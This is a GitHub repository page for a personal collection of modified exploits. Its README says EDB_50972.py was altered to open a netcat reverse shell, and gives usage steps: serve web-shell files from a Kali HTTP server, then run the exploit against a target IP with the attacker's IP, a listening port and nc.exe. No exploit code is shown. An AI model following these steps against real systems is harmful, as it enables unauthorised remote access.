Skip to content

M3mby7e/modified_exploits

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

Description:

I will keep my modified exploits here in this repo.

EDB_50972.py:

Original exploit expects a payload generated by msfvenom. I slightly modified the code to execute nc reverse shell.

Usage:

  1. (In Kali) Go in /usr/share/SecLists-master/Web-Shells/FuzzDB directory and start http server using python3 -m http.server 80
  2. Exploit takes 4 arguments and format is: python3 EDB_50972.py "target IP" "your local machine ip" "local revshell listening port" nc.exe

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages